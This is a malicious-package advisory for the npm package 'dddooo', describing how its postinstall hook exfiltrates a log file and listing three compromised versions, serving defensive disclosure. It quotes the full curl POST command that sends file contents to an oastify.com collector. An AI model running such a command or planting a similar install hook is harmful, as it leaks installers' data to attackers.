npm · Malicious package advisory
Malwaredddooo
MAL-2026-6460
Malicious code in dddooo (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (31763ebf0ebdd35b636e728b408f41ff8852cddeb34db5e188dc17c8374c6948) package.json declares a postinstall lifecycle script that runs automatically on `npm install`: `curl -X POST -d "$(cat /data/logs/monitor-2026-06-16.log)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data`. The script reads a file from the installer's filesystem and POSTs its contents over plain HTTP to an attacker-controlled Burp Collaborator (oastify.com) out-of-band interaction subdomain. The package presents itself as a `handy string utility functions` library, but has empty author/homepage/repository fields and includes a malformed `trunls -lae` keyword — the library framing is a cover for the install-time exfiltration. No legitimate string-utility package needs to read system log paths or beacon to oastify.com on install. ## Source: ossf-package-analysis (99d97fdc7c59d1871a9f0771694688026d7ee92d4bc37cdd48a52db1d9055246) The OpenSSF Package Analysis project identified 'dddooo' @ 1.0.2 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Compromised versions (3)
- 1.0.2
- 1.0.1
- 1.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.